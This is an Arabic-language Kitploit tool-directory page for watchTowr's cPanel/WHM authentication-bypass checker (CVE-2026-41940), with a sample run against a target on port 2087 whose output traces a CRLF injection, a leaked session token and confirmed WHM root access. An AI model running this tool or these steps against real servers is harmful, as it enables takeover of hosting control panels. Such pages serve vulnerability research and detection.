Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py — مولِّد قطع أثرية للكشف يتحقق من تجاوز المصادقة في cPanel/WHM (CVE-2026-41940) ويعرض تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر حقن CRLF، مستهدفًا واجهة إدارة WHM. | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-cpanel-whm-authbypass-to-rce.py
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubwatchtowrlabs/watchtowr-vs-cpanel-whm-authbypass-to-rce.py

watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

مولِّد قطع أثرية للكشف يتحقق من تجاوز المصادقة في cPanel/WHM (CVE-2026-41940) ويعرض تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر حقن CRLF، مستهدفًا واجهة إدارة WHM.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
416102منذ 3 أشهرتمت المراجعة من قبل Kitploit

cve-2026-41940 تجاوز مصادقة cPanel/WHM - مولّد مؤشرات الاكتشاف

أداة مولّد مؤشرات اكتشاف تجاوز مصادقة cPanel/WHM

الوصف

يتحقق مولّد مؤشرات الاكتشاف هذا مما إذا كان cPanel/WHM عرضة لتجاوز مصادقة حديث.

الاكتشاف في العمل

اختبر ضد نسخة عرضة للثغرة:

root@kitploit:~
python authbypass-RCE.py --target https://target:2087/ 
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

        (*) cPanel/WHM Authentication Bypass - Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-Pending]

[0] hostname = 
[1] minting a preauth session...
    session base = :vQ2WC5Bexp0oFSa7
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess5691070609
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.89"}

الإصدارات المتأثرة

راجع موقع cPanel الإلكتروني هنا

تابع مختبرات watchTowr

لأحدث الأبحاث الأمنية تابع فريق مختبرات watchTowr

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

تنزيل الأداة